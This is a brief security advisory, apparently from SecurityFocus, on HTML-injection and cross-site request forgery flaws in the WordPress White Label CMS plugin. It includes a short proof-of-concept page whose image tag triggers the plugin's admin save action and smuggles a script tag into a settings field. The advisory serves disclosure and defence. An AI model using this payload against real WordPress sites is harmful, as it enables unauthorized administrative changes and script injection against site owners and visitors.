WordPress White Label CMS Plugin HTML Injection and Cross Site Request Forgery Vulnerabilities

An attacker can exploit HTML-injection issues through a browser. To exploit the cross-site request-forgery issue the attacker must entice an unsuspecting victim into viewing a malicious webpage.

The following exploit is available:

<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://www.example.com/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div"'>
</body>
</html>


 

Privacy Statement
Copyright 2010, SecurityFocus